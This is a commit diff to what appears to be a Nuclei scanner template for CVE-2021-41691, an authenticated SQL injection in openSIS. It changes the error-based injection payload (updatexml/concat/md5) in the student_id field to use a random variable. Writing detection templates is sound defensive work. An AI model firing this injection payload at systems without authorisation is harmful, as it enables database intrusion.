Update CVE-2021-41691.yaml

2022-06-30 09:15:56 +05:30 · 2022-06-30 09:15:56 +05:30 · d91d12a358
parent f7c9ceed5b
commit d91d12a358
1 changed files with 4 additions and 1 deletions
--- a/cves/2021/CVE-2021-41691.yaml
+++ b/cves/2021/CVE-2021-41691.yaml
@ -13,6 +13,9 @@ info:
    cve-id: CVE-2021-41691
  tags: cve,cve2021,opensis,sqli,auth

+variables:
+  num: "999999999"
+
 requests:
  - raw:
      - |
@ -29,7 +32,7 @@ requests:
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded

-        student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5
+        student_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5

    attack: pitchfork
    payloads: